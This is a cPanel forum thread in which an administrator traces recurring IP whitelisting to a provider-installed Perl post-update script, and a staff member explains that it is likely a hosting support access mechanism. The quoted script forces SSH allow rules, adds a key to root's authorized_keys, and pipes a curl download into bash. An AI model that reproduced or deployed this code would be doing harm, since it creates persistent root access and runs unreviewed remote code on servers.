Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Security Issue with access restriction

Discussion in 'Security' started by carcaras, Jun 17, 2019.

  1. carcaras

    carcaras Registered

    Joined:
    Jun 17, 2019
    Messages:
    3
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Armenia
    cPanel Access Level:
    Root Administrator
    Hello.

    I am having an issue. I have 2 IP addresses that keep whitelisting from the host access control. I am checking the root cron jobs and these are the ones.

    Code:
    SHELL="/bin/bash"
    36 4 * * * /usr/local/cpanel/scripts/exim_tidydb > /dev/null 2>&1
    
    SHELL="/bin/bash"
    0 0 * * 7 truncate -s 0 /home/quikdraw/public_html/vqmod/checked.cache > /dev/nul 2>&1
    
    
    SHELL="/bin/bash"
    40 3 * * * /usr/local/cpanel/scripts/optimize_eximstats > /dev/null 2>&1
    
    
    SHELL="/bin/bash"
    
    SHELL="/bin/bash"
    
    SHELL="/bin/bash"
    
    SHELL="/bin/bash"
    58 22 * * * /usr/local/cpanel/scripts/cpbackup
    
    
    SHELL="/bin/bash"
    1 * * * * /usr/bin/test -x /usr/local/cpanel/bin/tail-check && /usr/local/cpanel/bin/tail-check
    
    
    SHELL="/bin/bash"
    36 */4 * * * /usr/bin/test -x /usr/local/cpanel/scripts/update_mailman_cache && /usr/local/cpanel/scripts/update_mailman_cache
    
    
    SHELL="/bin/bash"
    0 */4 * * * /usr/bin/test -x /usr/local/cpanel/scripts/update_db_cache && /usr/local/cpanel/scripts/update_db_cache
    
    
    SHELL="/bin/bash"
    
    SHELL="/bin/bash"
    29 */2 * * * /usr/local/cpanel/bin/mysqluserstore >/dev/null 2>&1
    
    SHELL="/bin/bash"
    9 */2 * * * /usr/local/cpanel/bin/dbindex >/dev/null 2>&1
    
    SHELL="/bin/bash"
    57 */6 * * * /usr/local/cpanel/scripts/autorepair recoverymgmt >/dev/null 2>&1
    
    SHELL="/bin/bash"
    */5 * * * * /usr/local/cpanel/scripts/dcpumon-wrapper >/dev/null 2>&1
    
    SHELL="/bin/bash"
    49 4 * * * /usr/local/cpanel/whostmgr/docroot/cgi/cpaddons_report.pl --notify
    
    SHELL="/bin/bash"
    23,38,53,8 * * * * /usr/local/cpanel/whostmgr/bin/dnsqueue > /dev/null 2>&1
    
    0 2 * * * /usr/local/cpanel/bin/backup
    
    @reboot /usr/local/cpanel/bin/onboot_handler
    
    0 5 * * * /usr/local/cpanel/3rdparty/bin/freshclam --quiet --no-warnings
    
    #26 23 * * 0 (/usr/local/cpanel/scripts/fix-cpanel-perl; /usr/local/cpanel/scripts/upcp --cron)
    
    26 23 * * * /etc/upcp_control
    
    5,20,35,50 * * * * /usr/local/cpanel/scripts/eximstats_spam_check 2>&1
    
    20 21 * * * /usr/local/cpanel/3rdparty/quickinstall/scripts/getCache.pl
    
    0 */2 * * * /usr/local/cpanel/scripts/shrink_modsec_ip_database -x 2>&1
    
    09,39 * * * * /usr/local/cpanel/scripts/clean_user_php_sessions > /dev/null 2>&1
    
    I don't see anything wrong in there that could change the IP list. Also I changed the server security so ssh can only be accessed using keys.

    These are the IPs entries. - Removed -

    But for WHM the site owner has dynamic IP, so I don't know how can we fix this security hole.

    Thanks in advance.
     
    #1 carcaras, Jun 17, 2019
    Last edited by a moderator: Jun 17, 2019
  2. keat63

    keat63 Well-Known Member

    Joined:
    Nov 20, 2014
    Messages:
    1,296
    Likes Received:
    91
    Trophy Points:
    28
    cPanel Access Level:
    Root Administrator
    I'm struggling to comprehend what you're asking.
    Could you re-iterate please.
     
  3. carcaras

    carcaras Registered

    Joined:
    Jun 17, 2019
    Messages:
    3
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Armenia
    cPanel Access Level:
    Root Administrator
    Sure, I keep blocking these 2 IP addresses in the "Host Access Control" (Home > Security Center >Host Access Control) and overnight theys are allowed again.

    - Removed -

    I just found the script doing it.

    /opt/postupcp/Modules.pm

    And these 2 "functions"

    Code:
    sub fix_ssh_perms {
    open(FILE, "</etc/hosts.allow");
    my $write;
    while(<FILE>) {
    next if ($_ =~ /70.87.80.194|50.23.47.206/);
    $write .= $_;
    }
    close(FILE);
    open(FILE, ">/etc/hosts.allow");
    print FILE "sshd : 70.87.80.194 : allow\n";
    print FILE "sshd : 50.23.47.206 : allow\n".$write;
    close(FILE);
    open(FILE, "</etc/hosts.deny");
    $write = '';
    while(<FILE>) {
    next if ($_ =~ /70.87.80.194|50.23.47.206/);
    $write .= $_;
    }
    close(FILE);
    open(FILE, ">/etc/hosts.deny");
    print FILE $write;
    close(FILE);
    system("chattr -ai /root/.ssh/* ; chmod 550 /root ; chown root. /root ; chmod 700 /root/.ssh ; chown root. /root/.ssh ; chmod 600 /root/.ssh/* ; chown root. /root/.ssh/* $
    }
    
    sub updatekey {
    print "[*] Running key update...";
    my $one = 0;
    my $two = 0;
    
    open(FILE,"/root/.ssh/authorized_keys");
    while(<FILE>) {
    if ( /tFkWcvQCYbHyiOIWGpz9/ ) {
    $one = 1;
    } elsif ( /user\@localhost/ ) {
    $two = 1;
    }
    }
    close(FILE);
    
    if ( $one == "0" ) {
    print "no key ";
    system("chattr -ia /root/.ssh/authorized_keys");
    open(WRITE,">>/root/.ssh/authorized_keys");
    print WRITE 'from="10.20.0.5,192.185.0.100,74.220.198.220,70.87.80.194,50.23.47.206,10.44.39.75,67.18.2.226",no-X11-forwarding,no-port-forwarding ssh-rsa AAAAB3Nz$
    close(WRITE);
    system("curl --connect-timeout 5 http://scripts3.hostgator.com/firefly.txt?nokey > /dev/null");
    
    }
    
    if ( $two == "1" || -e "/.cache/.ntp" ) {
    system("chattr -ia /root/.ssh/authorized_keys");
    system("sed -i '/user\@localhost/d' /root/.ssh/authorized_key*");
    system("curl --connect-timeout 5 http://scripts3.hostgator.com/firefly.txt?resolve | bash");
    print "clean ";
    }
    print "\n";
    }
    
    
    They seem to be from the host company (Hostgator) but I can't be sure, I am asking them but they are taking forever to reply.

    I am concerned because we are handling some delicate information within our servers.
     
  4. cPanelLauren

    cPanelLauren Forums Analyst II Staff Member

    Joined:
    Nov 14, 2017
    Messages:
    6,476
    Likes Received:
    507
    Trophy Points:
    263
    Location:
    Houston
    cPanel Access Level:
    DataCenter Provider
    That's a postupcp script that is running every time upcp runs (at night) more than likely your provider added it to ensure that they'd be able to access the server in a disaster or support situation. You'll need to discuss with them if you're able to remove the script.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  5. carcaras

    carcaras Registered

    Joined:
    Jun 17, 2019
    Messages:
    3
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Armenia
    cPanel Access Level:
    Root Administrator
    Thank you! That's exactly the case here. I am waiting for a reply from them!
     
    cPanelLauren likes this.
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice